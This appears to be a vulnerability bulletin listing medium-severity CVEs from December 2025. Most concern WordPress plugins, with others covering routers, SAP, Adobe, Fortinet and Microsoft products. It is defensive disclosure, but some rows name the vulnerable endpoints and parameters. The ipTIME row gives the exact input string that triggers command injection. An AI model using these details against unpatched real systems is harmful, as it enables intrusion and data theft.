| markutos987--Product Filtering by Categories, Tags, Price Range for WooCommerce Filter Plus | The Product Filtering by Categories, Tags, Price Range for WooCommerce - Filter Plus plugin for WordPress is vulnerable to unauthorized modification of data in all versions up to, and including, 1.1.5 due to a missing capability check on the 'filter_save_settings' and 'add_filter_options' AJAX actions. This makes it possible for unauthenticated attackers to modify the plugin's settings and create arbitrary filter options. | 2025-12-12 | 5.3 | CVE-2025-13314 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c9686681-4e64-43f1-ba0a-56d10c8d1db9?source=cve https://plugins.trac.wordpress.org/browser/filter-plus/tags/1.1.5/core/admin/settings/action.php#L23 https://plugins.trac.wordpress.org/browser/filter-plus/tags/1.1.5/core/admin/settings/action.php#L82 https://plugins.trac.wordpress.org/browser/filter-plus/tags/1.1.5/core/admin/settings/action.php#L28 https://plugins.trac.wordpress.org/browser/filter-plus/tags/1.1.5/base/enqueue.php#L178 |
| emarket-design--Employee Spotlight Team Member Showcase & Meet the Team Plugin | The Employee Spotlight - Team Member Showcase & Meet the Team Plugin for WordPress is vulnerable to unauthorized tracking settings modification due to missing authorization validation on the employee_spotlight_check_optin() function in all versions up to, and including, 5.1.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enable or disable tracking settings. | 2025-12-13 | 5.3 | CVE-2025-13403 | https://www.wordfence.com/threat-intel/vulnerabilities/id/19738a82-8c31-45bb-a869-68e357299eb5?source=cve https://plugins.trac.wordpress.org/browser/employee-spotlight/trunk/includes/plugin-feedback-functions.php#L19 https://plugins.trac.wordpress.org/browser/employee-spotlight/tags/5.1.3/includes/plugin-feedback-functions.php#L19 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3418117%40employee-spotlight&new=3418117%40employee-spotlight&sfp_email=&sfph_mail= |
| premmerce--Premmerce Wishlist for WooCommerce | The Premmerce Wishlist for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.1.10. This is due to a missing capability check on the deleteWishlist() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary wishlists. | 2025-12-12 | 5.3 | CVE-2025-13440 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9347900c-61c2-4d63-885e-e971c646b737?source=cve https://plugins.trac.wordpress.org/browser/premmerce-woocommerce-wishlist/trunk/src/Admin/Admin.php#L334 https://plugins.trac.wordpress.org/browser/premmerce-woocommerce-wishlist/tags/1.1.10/src/Admin/Admin.php#L334 |
| properfraction--Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content ProfilePress | The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content - ProfilePress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 4.16.7 due to insufficient input sanitization on the `type` parameter in the form preview functionality. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes via the `pp_preview_form` endpoint. | 2025-12-09 | 5.4 | CVE-2025-13642 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4736d139-814e-4eeb-91e8-5ee41fc35a8f?source=cve https://plugins.trac.wordpress.org/browser/wp-user-avatar/trunk/src/Classes/FormPreviewHandler.php#L71 https://plugins.trac.wordpress.org/browser/wp-user-avatar/trunk/src/Classes/FormPreviewHandler.php#L15 https://plugins.trac.wordpress.org/changeset/3408055/ |
| rcatheme--Guest Support | The Guest Support plugin for WordPress is vulnerable to User Email Disclosure in versions up to, and including, 1.2.3. This is due to the plugin exposing a public AJAX endpoint that allows anyone to search for and retrieve user email addresses without any authentication or capability checks. This makes it possible for unauthenticated attackers to enumerate user accounts and extract email addresses via the guest_support_handler=ajax endpoint with the request=get_users parameter. | 2025-12-12 | 5.3 | CVE-2025-13660 | https://www.wordfence.com/threat-intel/vulnerabilities/id/01299aba-0dff-47fd-9e90-ee84f00a0f3b?source=cve https://plugins.trac.wordpress.org/browser/guest-support/trunk/includes/library/ajax.php#L22 https://plugins.trac.wordpress.org/browser/guest-support/tags/1.2.3/includes/library/ajax.php#L22 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3412822%40guest-support&new=3412822%40guest-support&sfp_email=&sfph_mail= |
| mailerlite--MailerLite Signup forms (official) | The MailerLite - Signup forms (official) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'form_description' and 'success_message' parameters in versions up to, and including, 1.7.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 5.5 | CVE-2025-13993 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8c37cc28-fde0-45c6-b49c-d6dfb296c4a5?source=cve https://plugins.trac.wordpress.org/browser/official-mailerlite-sign-up-forms/tags/1.7.14/src/Controllers/AdminController.php#L179 https://plugins.trac.wordpress.org/browser/official-mailerlite-sign-up-forms/tags/1.7.14/src/Controllers/AdminController.php#L224 https://plugins.trac.wordpress.org/browser/official-mailerlite-sign-up-forms/tags/1.7.14/src/Views/CustomForm.php#L38 https://plugins.trac.wordpress.org/browser/official-mailerlite-sign-up-forms/tags/1.7.14/src/Views/CustomForm.php#L94 https://plugins.trac.wordpress.org/changeset/3416100/official-mailerlite-sign-up-forms/trunk/src/Controllers/AdminController.php |
| rodolforizzo76--Simple Bike Rental | The Simple Bike Rental plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'simpbire_carica_prenotazioni' AJAX action in all versions up to, and including, 1.0.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve all booking records containing customers' personally identifiable information (PII), including names, email addresses, and phone numbers. | 2025-12-12 | 5.3 | CVE-2025-14065 | https://www.wordfence.com/threat-intel/vulnerabilities/id/06f4e758-3328-4ac1-956a-cfadddd12e53?source=cve https://plugins.trac.wordpress.org/browser/simple-bike-rental/trunk/includes/ajax.php#L137 https://plugins.trac.wordpress.org/browser/simple-bike-rental/tags/1.0.5/includes/ajax.php#L137 https://plugins.trac.wordpress.org/changeset/3414692/simple-bike-rental/ |
| addonsorg--PDF for Contact Form 7 + Drag and Drop Template Builder | The PDF for Contact Form 7 + Drag and Drop Template Builder plugin for WordPress is vulnerable to unauthorized post duplication due to a missing capability check on the 'rednumber_duplicate' function in all versions up to, and including, 6.3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to duplicate arbitrary posts, including password protected or private ones. | 2025-12-12 | 5.3 | CVE-2025-14074 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0d00b50c-949a-4fd0-9eab-3555d263fcc7?source=cve https://plugins.trac.wordpress.org/browser/pdf-for-contact-form-7/trunk/backend/index.php#L697 https://plugins.trac.wordpress.org/browser/pdf-for-contact-form-7/tags/6.3.2/backend/index.php#L697 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3416014%40pdf-for-contact-form-7&new=3416014%40pdf-for-contact-form-7&sfp_email=&sfph_mail= |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in GLib (Gnome Lib). This vulnerability allows a remote attacker to cause heap corruption, leading to a denial of service or potential code execution via a buffer-underflow in the GVariant parser when processing maliciously crafted input strings. | 2025-12-10 | 5.6 | CVE-2025-14087 | https://access.redhat.com/security/cve/CVE-2025-14087 RHBZ#2419093 |
| ludwigyou--WPMasterToolKit (WPMTK) All in one plugin | The WPMasterToolKit plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 2.13.0. This is due to the plugin allowing Author-level users to create and execute arbitrary PHP code through the Code Snippets feature without proper capability checks. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute arbitrary PHP code on the server, leading to remote code execution, privilege escalation, and complete site compromise. | 2025-12-12 | 5.3 | CVE-2025-14166 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6049996a-514a-44f7-9878-4aa43598842a?source=cve https://plugins.trac.wordpress.org/browser/wpmastertoolkit/trunk/admin/modules/core/class-code-snippets.php#L135 https://plugins.trac.wordpress.org/browser/wpmastertoolkit/tags/2.13.0/admin/modules/core/class-code-snippets.php#L135 https://plugins.trac.wordpress.org/browser/wpmastertoolkit/trunk/admin/modules/core/class-code-snippets.php#L628 https://plugins.trac.wordpress.org/browser/wpmastertoolkit/tags/2.13.0/admin/modules/core/class-code-snippets.php#L628 https://plugins.trac.wordpress.org/log/wpmastertoolkit/ |
| stiand--Vimeo SimpleGallery | The Vimeo SimpleGallery plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 0.2. This is due to missing authorization checks on the `vimeogallery_admin` function hooked to `admin_menu`. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify arbitrary plugin settings via the `action` parameter. | 2025-12-12 | 5.3 | CVE-2025-14170 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0bb28557-7023-481f-a05b-0b9a22d7a456?source=cve https://plugins.trac.wordpress.org/browser/vimeo-simplegallery/trunk/vimeo_simplegallery.php#L22 https://plugins.trac.wordpress.org/browser/vimeo-simplegallery/tags/0.2/vimeo_simplegallery.php#L22 |
| Ilevia--EVE X1 Server | A vulnerability was determined in Ilevia EVE X1 Server up to 4.6.5.0.eden. Impacted is an unknown function of the file /ajax/php/leaf_search.php. This manipulation of the argument line causes command injection. The attack can be initiated remotely. A high degree of complexity is needed for the attack. The exploitability is considered difficult. The exploit has been publicly disclosed and may be utilized. Upgrading the affected component is recommended. The vendor confirms the issue and recommends: "We already know that issue and on most devices are already solved, also it's not needed to open the port to outside world so we advised our customer to close it". | 2025-12-08 | 5.6 | CVE-2025-14276 | VDB-334802 \| Ilevia EVE X1 Server leaf_search.php command injection VDB-334802 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702649 \| Ilevia Srl. Ilevia EVE X1 Server 4.6.5.0.eden Command Injection https://www.yuque.com/yuqueyonghuexlgkz/zepczx/ahygt5u6sgqpk5tt?singleDoc |
| Tenda--AC9 | A vulnerability was determined in Tenda AC9 15.03.05.14_multi. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/DownloadCfg.jpg of the component Configuration File Handler. This manipulation causes information disclosure. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-09 | 5.3 | CVE-2025-14286 | VDB-334874 \| Tenda AC9 Configuration File DownloadCfg.jpg information disclosure VDB-334874 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702723 \| Tenda AC9 V1.0 V15.03.05.14_multi Information Disclosure https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN11.md https://www.tenda.com.cn/ |
| dugudlabs--Eyewear prescription form | The Eyewear prescription form plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 6.0.1. This is due to missing capability checks on the RemoveItems AJAX action. This makes it possible for unauthenticated attackers to delete arbitrary WooCommerce product categories, including all of their child categories, via the 'catIds' parameter. | 2025-12-13 | 5.3 | CVE-2025-14365 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b85fc103-20e5-4599-8ed5-5bd5d9c447ee?source=cve https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L74 https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L326 |
| dugudlabs--Eyewear prescription form | The Eyewear prescription form plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 6.0.1. This is due to missing authorization checks on the SubmitCatProductRequest AJAX action. This makes it possible for unauthenticated attackers to create arbitrary WooCommerce products with custom names, prices, and category assignments via the 'Name', 'Price', and 'Parent' parameters. | 2025-12-13 | 5.3 | CVE-2025-14366 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0f21d7a2-3b4f-487f-a64a-b963427233b3?source=cve https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L71 https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L369 |
| corsonr--Easy Theme Options | The Easy Theme Options plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.0. This is due to missing authorization checks in the eto_import_settings function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to import arbitrary plugin settings via the 'eto_import_settings' parameter. | 2025-12-13 | 5.3 | CVE-2025-14367 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8405e80d-fd72-4d87-b08a-19a686eb2982?source=cve https://plugins.trac.wordpress.org/browser/easy-theme-options/tags/1.0/easy-theme-options.php#L277 https://plugins.trac.wordpress.org/browser/easy-theme-options/tags/1.0/easy-theme-options.php#L282 |
| ays-pro--Secure Copy Content Protection and Content Locking | The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to sensitive information exposure due to storage of exported CSV files in a publicly accessible directory with predictable filenames in all versions up to, and including, 4.9.2. This makes it possible for unauthenticated attackers to access sensitive user data including emails, IP addresses, usernames, roles, and location data by directly accessing the exported CSV file. | 2025-12-12 | 5.3 | CVE-2025-14442 | https://www.wordfence.com/threat-intel/vulnerabilities/id/72b95777-d17b-4504-95fd-c83b18106b9e?source=cve https://wordpress.org/plugins/secure-copy-content-protection/#developers https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.9.0/admin/class-secure-copy-content-protection-admin.php#L557 https://plugins.trac.wordpress.org/browser/secure-copy-content-protection/tags/4.9.3/admin/class-secure-copy-content-protection-admin.php#L560 |
| pcantoni--AnnunciFunebri Impresa | The AnnunciFunebri Impresa plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the annfu_reset_options() function in all versions up to, and including, 4.7.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all 29 plugin options, effectively resetting the plugin to its default state. | 2025-12-13 | 5.3 | CVE-2025-14447 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2b9ea2a2-34af-408c-91ee-6d5fd9431529?source=cve https://plugins.trac.wordpress.org/browser/annuncifunebri-onoranza/trunk/functions.inc.php#L845 https://plugins.trac.wordpress.org/browser/annuncifunebri-onoranza/tags/4.7.0/functions.inc.php#L845 |
| EFM--ipTIME A3004T | A weakness has been identified in EFM ipTIME A3004T 14.19.0. This vulnerability affects the function show_debug_screen of the file /sess-bin/timepro.cgi of the component Administrator Password Handler. This manipulation of the argument aaksjdkfj with the input !@dnjsrureljrm*& causes command injection. The attack is possible to be carried out remotely. The complexity of an attack is rather high. It is stated that the exploitability is difficult. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 5 | CVE-2025-14485 | VDB-335768 \| EFM ipTIME A3004T Administrator Password timepro.cgi show_debug_screen command injection VDB-335768 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702655 \| EFM NETWORKS CO., LTD. ipTime A3004T 14.19.0 Command Injection https://www.yuque.com/yuqueyonghuexlgkz/zepczx/mf0uog9s2ycay4g2?singleDoc https://pan.baidu.com/s/12VsWYY-bf2-Kfufbs2dlXw?pwd=drt |
| Yalantis--uCrop | A vulnerability was determined in Yalantis uCrop 2.2.11. This affects the function UCropActivity of the file AndroidManifest.xml. Executing manipulation can lead to improper export of android application components. The attack can only be executed locally. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 5.3 | CVE-2025-14517 | VDB-335855 \| Yalantis uCrop AndroidManifest.xml UCropActivity improper export of android application components VDB-335855 \| CTI Indicators (IOB, IOC, IOA) Submit #702811 \| uCrop Android Library uCrop 2.2.11 Intent Spoofing https://mesquite-dream-86b.notion.site/uCrop-Library-SSRF-and-Intent-Spoofing-2b8512562197804dae69edf96b942446?source=copy_link https://mesquite-dream-86b.notion.site/uCrop-Library-SSRF-and-Intent-Spoofing-2b8512562197804dae69edf96b942446#469832583e0444dcb3d08b0ca661d1c6 |
| baowzh--hfly | A weakness has been identified in baowzh hfly up to 638ff9abe9078bc977c132b37acbe1900b63491c. Impacted is an unknown function of the file /admin/index.php/datafile/delfile. This manipulation of the argument filename causes path traversal. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. This product adopts a rolling release strategy to maintain continuous delivery The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 5.4 | CVE-2025-14520 | VDB-335858 | baowzh hfly delfile path traversal VDB-335858 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702948 | GitHub hfly 1.0 Arbitrary file deleteing https://github.com/Xor-Gerke/webray.com.cn/blob/main/cve/PHP-based%20travel%20website-CMS/PHP-based%20travel%20website-CMS%20delfile%20filename%20Arbitrary%20file%20delete.md |
| D-Link--DIR-803 | A vulnerability was detected in D-Link DIR-803 up to 1.04. Impacted is an unknown function of the file /getcfg.php of the component Configuration Handler. The manipulation of the argument AUTHORIZED_GROUP results in information disclosure. The attack may be performed from remote. The exploit is now public and may be used. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-11 | 5.3 | CVE-2025-14528 | VDB-335869 | D-Link DIR-803 Configuration getcfg.php information disclosure VDB-335869 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #703150 | D-Link DIR-803 1.04 and earlier Authorization Bypass https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.md https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-2/DIR-803%20Authentication%20Bypass.md#poc https://www.dlink.com/ |
| rang501--Shortcode Ajax | The Shortcode Ajax plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.0. This is due to an action that passes a user-supplied value to do_shortcode without properly validating it. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2025-12-13 | 5.4 | CVE-2025-14539 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8e2a994f-7a42-4ccb-8fa0-77107ba1150c?source=cve https://plugins.trac.wordpress.org/browser/shortcode-ajax/trunk/shortcode-ajax.php#L29 |
| haxxorsid--Stock-Management-System | A missing authentication vulnerability has been identified in haxxorsid Stock-Management-System up to commit fbbbf213e9c93b87183a3891f77e3cc7095f22b0, in an unknown function of the file /api/employees. The attack can be launched remotely and an exploit is publicly available. This product uses rolling releases to provide continuous delivery, so version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-12 | 5.3 | CVE-2025-14567 | VDB-336191; haxxorsid Stock-Management-System employees missing authentication VDB-336191; CTI Indicators (IOB, IOC, IOA) Submit #703879; haxxorsid stock-management-system 1.0 Improper Access Controls https://github.com/ixpqxi/CVE_LIST/blob/master/stock_management_system/access_control_vulnerability.md |
| ggml-org--whisper.cpp | A use-after-free vulnerability was detected in ggml-org whisper.cpp up to 1.8.2 in the function read_audio_data of the file /whisper.cpp/examples/common-whisper.cpp (the reference describes it as a free of memory not on the heap). The attack requires local access. An exploit is public. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-12 | 5.3 | CVE-2025-14569 | VDB-336193; ggml-org whisper.cpp common-whisper.cpp read_audio_data use after free VDB-336193; CTI Indicators (IOB, IOC, IOA) Submit #703886; ggerganov whisper.cpp v1.8.2 Free of Memory not on the Heap https://github.com/ggml-org/whisper.cpp/issues/3501 https://github.com/oneafter/InvalidFree/blob/main/repro |
| villatheme--HAPPY Helpdesk Support Ticket System | The HAPPY - Helpdesk Support Ticket System plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the 'submit_form_reply' AJAX action in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to submit replies to arbitrary support tickets by manipulating the 'happy_topic_id' parameter, regardless of whether they are the ticket owner or have been assigned to the ticket. | 2025-12-13 | 5.3 | CVE-2025-14581 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3967b5ce-f0f8-4620-8883-0857aeee8f8b?source=cve https://plugins.trac.wordpress.org/browser/happy-helpdesk-support-ticket-system/trunk/inc/happy-replies.php#L585 https://plugins.trac.wordpress.org/browser/happy-helpdesk-support-ticket-system/tags/1.0.9/inc/happy-replies.php#L585 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3417847%40happy-helpdesk-support-ticket-system&new=3417847%40happy-helpdesk-support-ticket-system&sfp_email=&sfph_mail= |
| tiny-rdm--Tiny RDM | An insecure deserialization vulnerability has been detected in tiny-rdm Tiny RDM up to 1.2.5, in the function pickle.loads of the file pickle_convert.go (Pickle Decoding component). The attack can be initiated remotely, but is considered complex and difficult to exploit. An exploit has been disclosed publicly. The project was informed of the problem early through an issue report but has not responded yet. | 2025-12-13 | 5 | CVE-2025-14606 | VDB-336282; tiny-rdm Tiny RDM Pickle Decoding pickle_convert.go pickle.loads deserialization VDB-336282; CTI Indicators (IOB, IOC, IOA) Submit #704138; tiny-rdm Tiny RDM 1.2.5 Insecure Deserialization https://github.com/tiny-craft/tiny-rdm/issues/512 |
| Jehovahs Witnesses--JW Library App | A path traversal vulnerability has been found in the JW Library app up to 15.5.1 on Android, in an unknown function of the component org.jw.jwlibrary.mobile.activity.SiloContainer. Local access is required to carry out this attack. An exploit has been disclosed to the public. | 2025-12-13 | 5.3 | CVE-2025-14617 | VDB-336303; Jehovahs Witnesses JW Library App org.jw.jwlibrary.mobile.activity.SiloContainer path traversal VDB-336303; CTI Indicators (IOB, IOC, TTP) Submit #705077; Jehovah’s Witnesses (https://www.jw.org/finder?docid=802013031) JW Library APP (org.jw.jwlibrary.mobile) V15.5.1 Path Traversal https://github.com/Secsys-FDU/AF_CVEs/issues/1 |
| DecoCMS--Mesh | An improper access control flaw has been found in DecoCMS Mesh up to 1.0.0-alpha.31, in the function createTool of the file packages/sdk/src/mcp/teams/api.ts (Workspace Domain Handler), via manipulation of the argument domain. The attack can be initiated remotely, but is considered complex and difficult to exploit. An exploit has been published. Upgrading to version 1.0.0-alpha.32 (patch 5f7315e05852faf3a9c177c0a34f9ea9b0371d3d) addresses this issue; upgrading the affected component is recommended. | 2025-12-14 | 5.6 | CVE-2025-14660 | VDB-336392; DecoCMS Mesh Workspace Domain api.ts createTool access control VDB-336392; CTI Indicators (IOB, IOC, TTP, IOA) Submit #713741; Deco deco-mesh runtime v1.0.0-alpha.31 Improper Access Controls https://github.com/decocms/mesh/pull/1967 https://github.com/decocms/mesh/pull/1967#issuecomment-3622379237 https://github.com/decocms/mesh/pull/1967#issue-3700934099 https://github.com/decocms/mesh/commit/5f7315e05852faf3a9c177c0a34f9ea9b0371d3d https://github.com/decocms/mesh/releases/tag/runtime-v1.0.0-alpha.32 |
| Siemens--Gridscale X Prepay | A vulnerability has been identified in Gridscale X Prepay (All versions < V4.2.1). The affected application is vulnerable to user enumeration due to distinguishable responses. This could allow an unauthenticated remote attacker to determine if a user is valid or not, enabling a brute force attack with valid users. | 2025-12-09 | 5.3 | CVE-2025-40806 | https://cert-portal.siemens.com/productcert/html/ssa-356310.html |
| SAP_SE--SAPUI5 framework (Markdown-it component) | SAPUI5 (and OpenUI5) packages use outdated third-party libraries with known security vulnerabilities. When markdown-it encounters specially malformed input, it fails to terminate properly, resulting in an infinite loop. This denial of service via infinite loop causes high CPU usage and system unresponsiveness due to a blocked processing thread. This vulnerability has no impact on confidentiality or integrity but has a high impact on system availability. | 2025-12-09 | 5.9 | CVE-2025-42873 | https://me.sap.com/notes/3676970 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP Enterprise Search for ABAP | Due to a missing authorization check in SAP Enterprise Search for ABAP, an attacker with high privileges may read and export the contents of database tables into an ABAP report. This could lead to a high impact on data confidentiality and a low impact on data integrity. There is no impact on the application's availability. | 2025-12-09 | 5.5 | CVE-2025-42891 | https://me.sap.com/notes/3659117 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP BusinessObjects Business Intelligence Platform | SAP BusinessObjects Business Intelligence Platform lets an unauthenticated remote attacker send crafted requests through the URL parameter that controls the login page error message. This can cause the server to fetch attacker-supplied URLs, resulting in low impact to confidentiality and integrity, and no impact to availability. | 2025-12-09 | 5.4 | CVE-2025-42896 | https://me.sap.com/notes/3651390 https://url.sap/sapsecuritypatchday |
| bannersky--BSK PDF Manager | The BSK PDF Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-12-12 | 5.5 | CVE-2025-4970 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3cf1983b-4cb7-4738-9f19-2c530a9939e0?source=cve https://wordpress.org/plugins/bsk-pdf-manager/#developers https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3405989%40bsk-pdf-manager&new=3405989%40bsk-pdf-manager&sfp_email=&sfph_mail= |
| Fortinet--FortiSandbox | An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] in Fortinet FortiSandbox 5.0.0 through 5.0.2, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, and FortiSandbox 4.0 all versions may allow an attacker to perform an XSS attack via crafted HTTP requests. | 2025-12-09 | 5.3 | CVE-2025-54353 | https://fortiguard.fortinet.com/psirt/FG-IR-25-477 |
| Meta--react-server-dom-webpack | An information leak vulnerability exists in specific configurations of React Server Components versions 19.0.0, 19.0.1, 19.1.0, 19.1.1, 19.1.2, 19.2.0 and 19.2.1, including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. A specifically crafted HTTP request sent to a vulnerable Server Function may unsafely return the source code of any Server Function. Exploitation requires the existence of a Server Function which explicitly or implicitly exposes a stringified argument. | 2025-12-11 | 5.3 | CVE-2025-55183 | https://www.facebook.com/security/advisories/cve-2025-55183 https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components |
| PowerDNS--Recursor | An attacker can trigger an assertion failure by requesting crafted DNS records, waiting for them to be inserted into the records cache, and then sending a query with qtype set to ANY. | 2025-12-09 | 5.3 | CVE-2025-59029 | https://docs.powerdns.com/recursor/security-advisories/powerdns-advisory-2025-07.html |
| Pegasystems--Pega Infinity | Pega Platform versions 7.1.0 through Infinity 25.1.0 are affected by a user enumeration vulnerability. This issue occurs during the user authentication process, where a difference in response time could allow a remote unauthenticated user to determine whether a username is valid. This only applies to the deprecated basic-authentication feature; other, more secure authentication mechanisms are recommended. A fix is provided in the 24.1.4, 24.2.4, and 25.1.1 patch releases. Please note: the Basic credentials authentication service type has been deprecated since version 24.2: https://docs.pega.com/bundle/platform/page/platform/release-notes/security/whats-new-security-242.html. | 2025-12-10 | 5.3 | CVE-2025-62181 | https://support.pega.com/support-doc/pega-security-advisory-j25-vulnerability-remediation-note |
| c-ares--c-ares | c-ares is an asynchronous resolver library. Versions 1.32.3 through 1.34.5 terminate a query after maximum attempts when using read_answer() and process_answer(), which can cause a Denial of Service. This issue is fixed in version 1.34.6. | 2025-12-08 | 5.9 | CVE-2025-62408 | https://github.com/c-ares/c-ares/security/advisories/GHSA-jq53-42q6-pqr5 https://github.com/c-ares/c-ares/commit/714bf5675c541bd1e668a8db8e67ce012651e618 |
| Microsoft--Windows Server 2025 (Server Core installation) | Out-of-bounds read in Windows Defender Firewall Service allows an authorized attacker to disclose information locally. | 2025-12-09 | 5.5 | CVE-2025-62468 | Windows Defender Firewall Service Information Disclosure Vulnerability |
| Microsoft--Windows 10 Version 1809 | Integer underflow (wrap or wraparound) in Windows Hyper-V allows an authorized attacker to deny service over a network. | 2025-12-09 | 5.3 | CVE-2025-62567 | Windows Hyper-V Denial of Service Vulnerability |
| Fortinet--FortiOS | An insufficient session expiration vulnerability [CWE-613] in Fortinet FortiOS 7.4.0, FortiOS 7.2 all versions, FortiOS 7.0 all versions, and FortiOS 6.4 all versions allows an attacker to maintain access to network resources via an active SSLVPN session that is not terminated after a user's password change, under particular conditions outside of the attacker's control. | 2025-12-09 | 5.3 | CVE-2025-62631 | https://fortiguard.fortinet.com/psirt/FG-IR-25-411 |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2025-12-10 | 5.4 | CVE-2025-64541 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64543 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64544 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited by a low privileged attacker to execute malicious scripts in the context of the victim's browser. Exploitation of this issue requires user interaction, such as visiting a crafted URL or interacting with a manipulated web page. | 2025-12-10 | 5.4 | CVE-2025-64545 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
